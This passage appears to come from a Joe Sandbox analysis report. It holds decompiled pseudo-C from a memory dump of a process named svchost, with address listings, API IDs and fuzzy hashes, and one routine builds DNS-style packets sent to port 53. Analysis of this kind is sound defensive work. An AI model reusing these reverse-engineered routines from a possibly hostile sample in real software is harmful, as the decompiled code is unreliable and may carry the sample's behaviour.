                                                                                                                                                                                                                                                                          							E0401FC90(_t98, _v8, 0x426f34, 0x426f24, _v100, _v104);
                                                                                                                                                                                                                                                                          							if(_v100 != 0) {
                                                                                                                                                                                                                                                                          								_t133 = _v100;
                                                                                                                                                                                                                                                                          								_v124 = _v100;
                                                                                                                                                                                                                                                                          								E04020CC0(_v124);
                                                                                                                                                                                                                                                                          								_t143 = _t143 + 4;
                                                                                                                                                                                                                                                                          								_v100 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L15:
                                                                                                                                                                                                                                                                          							if(0 != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                          							return E04006C8C(_v8, _t98, _v12 ^ _t142, _t133, 0x426f34, 0x426f24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                          					_t143 = _t145 + 4;
                                                                                                                                                                                                                                                                          					_v112 = _t95;
                                                                                                                                                                                                                                                                          					if(_v112 == 0) {
                                                                                                                                                                                                                                                                          						_v132 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v132 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v8 = _v132;
                                                                                                                                                                                                                                                                          					_t133 =  &_v60;
                                                                                                                                                                                                                                                                          					E0401FC90(_t98, _v8, 0x426f34, 0x426f24,  &_v60, 0x2c);
                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L16;
                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                          0x04013410
                                                                                                                                                                                                                                                                          0x04013420
                                                                                                                                                                                                                                                                          0x04013425
                                                                                                                                                                                                                                                                          0x04013428
                                                                                                                                                                                                                                                                          0x0401342f
                                                                                                                                                                                                                                                                          0x04013447
                                                                                                                                                                                                                                                                          0x04013449
                                                                                                                                                                                                                                                                          0x04013457
                                                                                                                                                                                                                                                                          0x04013457
                                                                                                                                                                                                                                                                          0x04013459
                                                                                                                                                                                                                                                                          0x04013461
                                                                                                                                                                                                                                                                          0x040134b1
                                                                                                                                                                                                                                                                          0x040134d5
                                                                                                                                                                                                                                                                          0x040134de
                                                                                                                                                                                                                                                                          0x040134f0
                                                                                                                                                                                                                                                                          0x040134f6
                                                                                                                                                                                                                                                                          0x04013506
                                                                                                                                                                                                                                                                          0x04013532
                                                                                                                                                                                                                                                                          0x0401353d
                                                                                                                                                                                                                                                                          0x04013542
                                                                                                                                                                                                                                                                          0x04013545
                                                                                                                                                                                                                                                                          0x0401354c
                                                                                                                                                                                                                                                                          0x0401355e
                                                                                                                                                                                                                                                                          0x0401354e
                                                                                                                                                                                                                                                                          0x04013556
                                                                                                                                                                                                                                                                          0x04013556
                                                                                                                                                                                                                                                                          0x04013568
                                                                                                                                                                                                                                                                          0x0401356e
                                                                                                                                                                                                                                                                          0x0401357c
                                                                                                                                                                                                                                                                          0x04013585
                                                                                                                                                                                                                                                                          0x04013587
                                                                                                                                                                                                                                                                          0x0401358a
                                                                                                                                                                                                                                                                          0x04013591
                                                                                                                                                                                                                                                                          0x04013596
                                                                                                                                                                                                                                                                          0x04013599
                                                                                                                                                                                                                                                                          0x04013599
                                                                                                                                                                                                                                                                          0x040135a0
                                                                                                                                                                                                                                                                          0x040135a2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040135a8
                                                                                                                                                                                                                                                                          0x040135ba
                                                                                                                                                                                                                                                                          0x040135ba
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040134b3
                                                                                                                                                                                                                                                                          0x04013465
                                                                                                                                                                                                                                                                          0x0401346a
                                                                                                                                                                                                                                                                          0x0401346d
                                                                                                                                                                                                                                                                          0x04013474
                                                                                                                                                                                                                                                                          0x04013483
                                                                                                                                                                                                                                                                          0x04013476
                                                                                                                                                                                                                                                                          0x0401347e
                                                                                                                                                                                                                                                                          0x0401347e
                                                                                                                                                                                                                                                                          0x0401348d
                                                                                                                                                                                                                                                                          0x04013492
                                                                                                                                                                                                                                                                          0x04013499
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013499
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                                                                                                          • String ID: $oB
                                                                                                                                                                                                                                                                          • API String ID: 370429920-3132252410
                                                                                                                                                                                                                                                                          • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                          • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                          			E04011E70(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                          				signed short _v8;
                                                                                                                                                                                                                                                                          				signed short _v10;
                                                                                                                                                                                                                                                                          				signed short _v12;
                                                                                                                                                                                                                                                                          				signed short _v14;
                                                                                                                                                                                                                                                                          				signed short _v16;
                                                                                                                                                                                                                                                                          				signed short _v18;
                                                                                                                                                                                                                                                                          				signed short _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                                                                                                          				void _v120;
                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                          				void _v156;
                                                                                                                                                                                                                                                                          				signed int _v332;
                                                                                                                                                                                                                                                                          				intOrPtr _v336;
                                                                                                                                                                                                                                                                          				intOrPtr _v340;
                                                                                                                                                                                                                                                                          				intOrPtr _v344;
                                                                                                                                                                                                                                                                          				intOrPtr _v348;
                                                                                                                                                                                                                                                                          				char _v352;
                                                                                                                                                                                                                                                                          				intOrPtr _v356;
                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t95 = __ebx;
                                                                                                                                                                                                                                                                          				_v24 =  *0x429024 ^ _t141;
                                                                                                                                                                                                                                                                          				_v348 = __ecx;
                                                                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                                                                          				memcpy( &_v60, 0x426fdc, 8 << 2);
                                                                                                                                                                                                                                                                          				asm("movsw");
                                                                                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                                                                                          				memcpy( &_v156, 0x427000, 7 << 2);
                                                                                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                                                                                          				memcpy( &_v120, 0x427020, 0xc << 2);
                                                                                                                                                                                                                                                                          				asm("movsb");
                                                                                                                                                                                                                                                                          				_v336 = E04020CE0(0x3d);
                                                                                                                                                                                                                                                                          				_v124 = _v336;
                                                                                                                                                                                                                                                                          				E04007010(0x427038, _v124, 0, 0x3d);
                                                                                                                                                                                                                                                                          				 *0x425108( &_v332);
                                                                                                                                                                                                                                                                          				 *0x425180( &_v20);
                                                                                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                                                                                          				_t107 = _v332 / 0x3c * 0x64 + _v332 % 0x3c;
                                                                                                                                                                                                                                                                          				_v68 = _t107;
                                                                                                                                                                                                                                                                          				if(_t107 < 0) {
                                                                                                                                                                                                                                                                          					_v68 =  ~_v68;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_v332 > 0) {
                                                                                                                                                                                                                                                                          					_v352 = 0x427058;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v352 = 0x427054;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_t33 =  &_v352; // 0x427058
                                                                                                                                                                                                                                                                          				 *0x4251f8(_v124, 0x3c,  &_v60, _t141 + (_v16 & 0x0000ffff) * 4 - 0x98, _v14 & 0x0000ffff, _t141 + (_v18 & 0x0000ffff) * 4 - 0x78, _v20 & 0x0000ffff, _v12 & 0x0000ffff, _v10 & 0x0000ffff, _v8 & 0x0000ffff,  *_t33, _v68);
                                                                                                                                                                                                                                                                          				_v340 = E04020CE0(8);
                                                                                                                                                                                                                                                                          				if(_v340 == 0) {
                                                                                                                                                                                                                                                                          					_v356 = 0;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v356 = E0401F4E0(_v340);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v64 = _v356;
                                                                                                                                                                                                                                                                          				_t125 = _v124;
                                                                                                                                                                                                                                                                          				E0401FC90(_t95, _v64, 0x427038, 0x3c, _v124, E040070A0(_v124));
                                                                                                                                                                                                                                                                          				if(_v124 != 0) {
                                                                                                                                                                                                                                                                          					_v344 = _v124;
                                                                                                                                                                                                                                                                          					_t125 = _v344;
                                                                                                                                                                                                                                                                          					E04020CC0(_v344);
                                                                                                                                                                                                                                                                          					_v124 = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return E04006C8C(_v64, _t95, _v24 ^ _t141, _t125, 0x427038, 0x3c);
                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                          0x04011e70
                                                                                                                                                                                                                                                                          0x04011e80
                                                                                                                                                                                                                                                                          0x04011e85
                                                                                                                                                                                                                                                                          0x04011e8b
                                                                                                                                                                                                                                                                          0x04011e9f
                                                                                                                                                                                                                                                                          0x04011ea1
                                                                                                                                                                                                                                                                          0x04011ea3
                                                                                                                                                                                                                                                                          0x04011eb4
                                                                                                                                                                                                                                                                          0x04011eb6
                                                                                                                                                                                                                                                                          0x04011ec4
                                                                                                                                                                                                                                                                          0x04011ec6
                                                                                                                                                                                                                                                                          0x04011ed1
                                                                                                                                                                                                                                                                          0x04011edd
                                                                                                                                                                                                                                                                          0x04011ee8
                                                                                                                                                                                                                                                                          0x04011ef7
                                                                                                                                                                                                                                                                          0x04011f01
                                                                                                                                                                                                                                                                          0x04011f0d
                                                                                                                                                                                                                                                                          0x04011f20
                                                                                                                                                                                                                                                                          0x04011f28
                                                                                                                                                                                                                                                                          0x04011f2a
                                                                                                                                                                                                                                                                          0x04011f2d
                                                                                                                                                                                                                                                                          0x04011f34
                                                                                                                                                                                                                                                                          0x04011f34
                                                                                                                                                                                                                                                                          0x04011f3e
                                                                                                                                                                                                                                                                          0x04011f4c
                                                                                                                                                                                                                                                                          0x04011f40
                                                                                                                                                                                                                                                                          0x04011f40
                                                                                                                                                                                                                                                                          0x04011f40
                                                                                                                                                                                                                                                                          0x04011f5a
                                                                                                                                                                                                                                                                          0x04011f99
                                                                                                                                                                                                                                                                          0x04011fac
                                                                                                                                                                                                                                                                          0x04011fb9
                                                                                                                                                                                                                                                                          0x04011fce
                                                                                                                                                                                                                                                                          0x04011fbb
                                                                                                                                                                                                                                                                          0x04011fc6
                                                                                                                                                                                                                                                                          0x04011fc6
                                                                                                                                                                                                                                                                          0x04011fde
                                                                                                                                                                                                                                                                          0x04011fe1
                                                                                                                                                                                                                                                                          0x04011ff5
                                                                                                                                                                                                                                                                          0x04011ffe
                                                                                                                                                                                                                                                                          0x04012003
                                                                                                                                                                                                                                                                          0x04012009
                                                                                                                                                                                                                                                                          0x04012010
                                                                                                                                                                                                                                                                          0x04012018
                                                                                                                                                                                                                                                                          0x04012018
                                                                                                                                                                                                                                                                          0x04012031

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                          • String ID: pB$XpB
                                                                                                                                                                                                                                                                          • API String ID: 3713721629-2178088481
                                                                                                                                                                                                                                                                          • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                          • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                                                                                                          			E040093F6(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                                                                                                          				intOrPtr _t45;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t35 = __ebx;
                                                                                                                                                                                                                                                                          				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                          				_t23 =  *0x425190(0x425310, 0x427a18, 0xc);
                                                                                                                                                                                                                                                                          				if(_t23 == 0) {
                                                                                                                                                                                                                                                                          					_t23 = E040099AE(0x425310);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t46 - 0x1c)) = _t23;
                                                                                                                                                                                                                                                                          				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4259d0;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                                                                                                                                                          				if(_t23 != 0) {
                                                                                                                                                                                                                                                                          					_t35 =  *0x425114;
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t45 + 0x1f8)) =  *_t35(_t23, 0x425300);
                                                                                                                                                                                                                                                                          					_t6 = _t46 - 0x1c; // 0x42532c
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t45 + 0x1fc)) =  *_t35( *_t6, 0x42532c);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                                                                                                                                                          				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                                                                                                                                                          				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t45 + 0x68)) = 0x4294e8;
                                                                                                                                                                                                                                                                          				E0400B404(_t35, 0xd);
                                                                                                                                                                                                                                                                          				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                          				 *0x4250a4( *((intOrPtr*)(_t45 + 0x68)));
                                                                                                                                                                                                                                                                          				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                          				E040094CB();
                                                                                                                                                                                                                                                                          				E0400B404(_t35, 0xc);
                                                                                                                                                                                                                                                                          				 *(_t46 - 4) = 1;
                                                                                                                                                                                                                                                                          				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t45 + 0x6c)) =  *0x4294d8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E0400CA63( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                                                                                                                                                          				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                          				return E04009D2D(E040094D4());
                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                          0x040093f6
                                                                                                                                                                                                                                                                          0x040093fd
                                                                                                                                                                                                                                                                          0x04009408
                                                                                                                                                                                                                                                                          0x04009410
                                                                                                                                                                                                                                                                          0x04009413
                                                                                                                                                                                                                                                                          0x04009418
                                                                                                                                                                                                                                                                          0x04009419
                                                                                                                                                                                                                                                                          0x0400941c
                                                                                                                                                                                                                                                                          0x0400941f
                                                                                                                                                                                                                                                                          0x04009429
                                                                                                                                                                                                                                                                          0x0400942e
                                                                                                                                                                                                                                                                          0x04009436
                                                                                                                                                                                                                                                                          0x0400943e
                                                                                                                                                                                                                                                                          0x04009449
                                                                                                                                                                                                                                                                          0x0400944e
                                                                                                                                                                                                                                                                          0x0400944e
                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                          0x04009457
                                                                                                                                                                                                                                                                          0x0400945e
                                                                                                                                                                                                                                                                          0x04009465
                                                                                                                                                                                                                                                                          0x0400946e
                                                                                                                                                                                                                                                                          0x04009474
                                                                                                                                                                                                                                                                          0x0400947b
                                                                                                                                                                                                                                                                          0x04009481
                                                                                                                                                                                                                                                                          0x04009488
                                                                                                                                                                                                                                                                          0x0400948f
                                                                                                                                                                                                                                                                          0x04009495
                                                                                                                                                                                                                                                                          0x04009498
                                                                                                                                                                                                                                                                          0x0400949b
                                                                                                                                                                                                                                                                          0x040094a0
                                                                                                                                                                                                                                                                          0x040094a7
                                                                                                                                                                                                                                                                          0x040094a7
                                                                                                                                                                                                                                                                          0x040094ad
                                                                                                                                                                                                                                                                          0x040094b3
                                                                                                                                                                                                                                                                          0x040094c4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                          • String ID: ,SB
                                                                                                                                                                                                                                                                          • API String ID: 1628550938-3344058557
                                                                                                                                                                                                                                                                          • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                          • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                                                                          			E0401A890(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				short* _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				short* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				short* _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                          				char _v300;
                                                                                                                                                                                                                                                                          				intOrPtr _v304;
                                                                                                                                                                                                                                                                          				intOrPtr _v308;
                                                                                                                                                                                                                                                                          				intOrPtr _v312;
                                                                                                                                                                                                                                                                          				intOrPtr _v316;
                                                                                                                                                                                                                                                                          				intOrPtr _v320;
                                                                                                                                                                                                                                                                          				intOrPtr _t138;
                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                          				signed char _t187;
                                                                                                                                                                                                                                                                          				signed char _t192;
                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                          				void* _t253;
                                                                                                                                                                                                                                                                          				void* _t254;
                                                                                                                                                                                                                                                                          				signed int _t255;
                                                                                                                                                                                                                                                                          				void* _t256;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t254 = __esi;
                                                                                                                                                                                                                                                                          				_t253 = __edi;
                                                                                                                                                                                                                                                                          				_t195 = __ebx;
                                                                                                                                                                                                                                                                          				_v36 =  *0x429024 ^ _t255;
                                                                                                                                                                                                                                                                          				_v320 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0 && _a12 != 0 && _a16 >= 1 && _a16 <= 3) {
                                                                                                                                                                                                                                                                          					_t138 = E040070A0(_a4);
                                                                                                                                                                                                                                                                          					_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                          					_v296 = _t138;
                                                                                                                                                                                                                                                                          					if(_v296 >= 1) {
                                                                                                                                                                                                                                                                          						E04007010(_t253,  &_v292, 0, 0xff);
                                                                                                                                                                                                                                                                          						_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                          						_t228 =  &_v292;
                                                                                                                                                                                                                                                                          						_v20 = E04019850(_v320, _a4, _v296,  &_v292, 0xff);
                                                                                                                                                                                                                                                                          						if(_v20 >= 1) {
                                                                                                                                                                                                                                                                          							_v300 = 0;
                                                                                                                                                                                                                                                                          							if(_a16 != 1) {
                                                                                                                                                                                                                                                                          								if(_a16 != 2) {
                                                                                                                                                                                                                                                                          									if(_a16 != 3) {
                                                                                                                                                                                                                                                                          										goto L22;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v304 =  *0x425260(_a12);
                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                          											_v300 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v304 + 0xc))))));
                                                                                                                                                                                                                                                                          											_t187 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                          											_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                          											if((_t187 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          												E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                          												_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											goto L22;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v300 =  *0x425258(_a12);
                                                                                                                                                                                                                                                                          									_t192 = E0401BA40(4, _a12,  &_v300);
                                                                                                                                                                                                                                                                          									_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                          									if((_t192 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          										E0401C2A0(_t253, 4, _a12,  &_v300);
                                                                                                                                                                                                                                                                          										_t256 = _t256 + 0xc;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L22;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v300 = _a12;
                                                                                                                                                                                                                                                                          								L22:
                                                                                                                                                                                                                                                                          								_v308 = E04020CE0(0x1000);
                                                                                                                                                                                                                                                                          								_v32 = _v308;
                                                                                                                                                                                                                                                                          								E04007010(_t253, _v32, 0, 0x1000);
                                                                                                                                                                                                                                                                          								_v16 = 0;
                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                          								_v16 = _v32;
                                                                                                                                                                                                                                                                          								 *_v16 =  *0x4250b4();
                                                                                                                                                                                                                                                                          								 *(_v16 + 2) =  *(_v16 + 2) & 0x0000007f;
                                                                                                                                                                                                                                                                          								 *(_v16 + 2) =  *(_v16 + 2) & 0x00000087;
                                                                                                                                                                                                                                                                          								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fb;
                                                                                                                                                                                                                                                                          								 *(_v16 + 2) =  *(_v16 + 2) & 0x000000fd;
                                                                                                                                                                                                                                                                          								 *(_v16 + 2) =  *(_v16 + 2) | 0x00000001;
                                                                                                                                                                                                                                                                          								 *(_v16 + 3) =  *(_v16 + 3) & 0x0000007f;
                                                                                                                                                                                                                                                                          								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000bf;
                                                                                                                                                                                                                                                                          								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000df;
                                                                                                                                                                                                                                                                          								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000ef;
                                                                                                                                                                                                                                                                          								 *(_v16 + 3) =  *(_v16 + 3) & 0x000000f0;
                                                                                                                                                                                                                                                                          								 *((short*)(_v16 + 4)) =  *0x425278(1);
                                                                                                                                                                                                                                                                          								 *((short*)(_v16 + 6)) = 0;
                                                                                                                                                                                                                                                                          								 *((short*)(_v16 + 8)) = 0;
                                                                                                                                                                                                                                                                          								 *((short*)(_v16 + 0xa)) = 0;
                                                                                                                                                                                                                                                                          								E04006CA0(_t195, _t253, _t254, _v32 + 0xc,  &_v292);
                                                                                                                                                                                                                                                                          								_v28 = _v32 + E04008A9C( &_v292, 0xfe) + 0xd;
                                                                                                                                                                                                                                                                          								 *_v28 =  *0x425278(_a8 & 0x0000ffff, _v20);
                                                                                                                                                                                                                                                                          								 *((short*)(_v28 + 2)) =  *0x425278(1);
                                                                                                                                                                                                                                                                          								_t177 = E04008A9C( &_v292, 0xfe);
                                                                                                                                                                                                                                                                          								_t256 = _t256 + 0x2c;
                                                                                                                                                                                                                                                                          								_v24 = _t177 + 0x11;
                                                                                                                                                                                                                                                                          								_t228 = _v32;
                                                                                                                                                                                                                                                                          								_v8 = E0401D100(_t195,  *((intOrPtr*)(_v320 + 0x10)), _t253, _t254, _v300, 0x35, _v32, _v24);
                                                                                                                                                                                                                                                                          								if(_v32 != 0) {
                                                                                                                                                                                                                                                                          									_t228 = _v32;
                                                                                                                                                                                                                                                                          									_v312 = _v32;
                                                                                                                                                                                                                                                                          									E04020CC0(_v312);
                                                                                                                                                                                                                                                                          									_t256 = _t256 + 4;
                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(0 != 0) {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					if(_v8 == 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                          						_t228 = _v12;
                                                                                                                                                                                                                                                                          						_v316 = _v12;
                                                                                                                                                                                                                                                                          						E04020CC0(_v316);
                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return E04006C8C(_v8, _t195, _v36 ^ _t255, _t228, _t253, _t254);
                                                                                                                                                                                                                                                                          				}
